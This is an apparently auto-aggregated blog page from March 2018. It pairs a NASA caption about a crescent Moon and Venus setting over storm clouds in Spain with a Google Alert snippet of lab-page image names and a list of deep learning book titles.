Sometimes the sky above can become quite a show. In early September of 2010, for example, the Moon and Venus converged, creating quite a sight by itself for sky enthusiasts around the globe. From some locations, though, the sky was even more picturesque. In the featured image taken in Spain, a crescent Moon and the planet Venus, on the far right, were captured during sunset posing against a deep blue sky. In the foreground, dark storm clouds loom across the image bottom, while a white anvil cloud shape appears above. Black specks dot the frame, caused by a flock of birds taking flight. Very soon after this picture was taken, however, the birds passed by, the storm ended, and Venus and the Moon set. Bright Venus is again visible just after sunset this month (2018 March) and will appear quite near Mercury tonight and the rest of this week. via NASA http://ift.tt/2F7vb9Y

anonymous 75x75

anonymous 75x75. Department of Pharmacology · Research · Prof. Anne Willis · Research Interest · Publications · Willis Group · Laboratory Alumni · Laboratory News · Willis Docs-img · figure1600x450.jpg · WillisLab2016620x206.jpg · Jana75x75.jpg · tatyanachernova75x75.jpg · veronica 75x75 ...

from Google Alert - anonymous http://ift.tt/2tjpznK
via IFTTT

Latest YouTube Video

Saturday, March 10, 2018

Friday, March 9, 2018

Thursday, March 8, 2018

Wednesday, March 7, 2018

Tuesday, March 6, 2018

Monday, March 5, 2018

The 7 best deep learning books you should be reading right now

1. Deep Learning

2. Neural Networks and Deep Learning

3. Deep Learning with Python

4. Hands-On Machine Learning with Scikit-Learn and TensorFlow

5. TensorFlow Deep Learning Cookbook

6. Deep Learning: A Practitioners Approach

7. Deep Learning for Computer Vision with Python

Summary

Sunday, March 4, 2018